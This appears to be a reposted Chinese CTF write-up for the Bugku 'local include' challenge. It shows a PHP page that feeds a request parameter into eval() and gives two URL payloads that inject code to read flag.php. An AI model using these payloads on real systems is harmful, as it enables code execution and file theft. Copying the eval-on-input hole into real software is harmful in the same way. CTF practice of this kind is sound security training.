1. 首页
  2. 文章中心
  3. Other

bugku本地包含bugku本地包含

101 阅读 0 评论
我是靠谱客的博主 细心歌曲,这篇文章主要介绍bugku本地包含bugku本地包含,现在分享给大家,希望可以做个参考。

bugku本地包含

题目链接

页面提示:

复制代码
1
2
3
4
5
6
7
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>

代码分析

  1. include “flag.php”: include 语句包含并运行指定文件。
  2. $_REQUEST[‘hello’]: 通过 GET,POST 和 COOKIE 传递参数
  3. var_dump($a) : 输出变量的相关信息
  4. eval(): 把字符串当作命令直接执行
  5. show_source() : 函数对文件进行语法高亮显示。
  6. FILE: 当前文件

方法一:

复制代码
1
2
http://123.206.87.240:8003/?hello=1);print_r(file(%22./flag.php%22));//

相当于:eval( “var_dump(1);print_r(file(”./flag.php"));//);");
eval函数将引号内的字符串作为语句运行,所以//仅注释);

方法二:

复制代码
1
2
http://123.206.87.240:8003/?hello=file('flag.php')

file() 函数把整个文件读入一个数组中。(注意参数是字符串)

最后

以上就是细心歌曲最近收集整理的关于bugku本地包含bugku本地包含的全部内容,更多相关bugku本地包含bugku本地包含内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(67)

相关文章

第一个mybatis程序(IDEA)
第一个mybatis程序(IDEA)
文件包含漏洞原理与实践练习题
文件包含漏洞原理与实践练习题
bugku web 8 (文件包含)wp
bugku web 8 (文件包含)wp
bugku 本地包含 writeup
bugku 本地包含 writeup
bugku本地包含bugku本地包含
bugku本地包含bugku本地包含
ctf、本地包含、例1
ctf、本地包含、例1
ctf本地包括_文件包含CTF题目
ctf本地包括_文件包含CTF题目
bugku-文件包含2 writeup文件包含2
bugku-文件包含2 writeup文件包含2

评论列表共有 0 条评论

立即
投稿
返回
顶部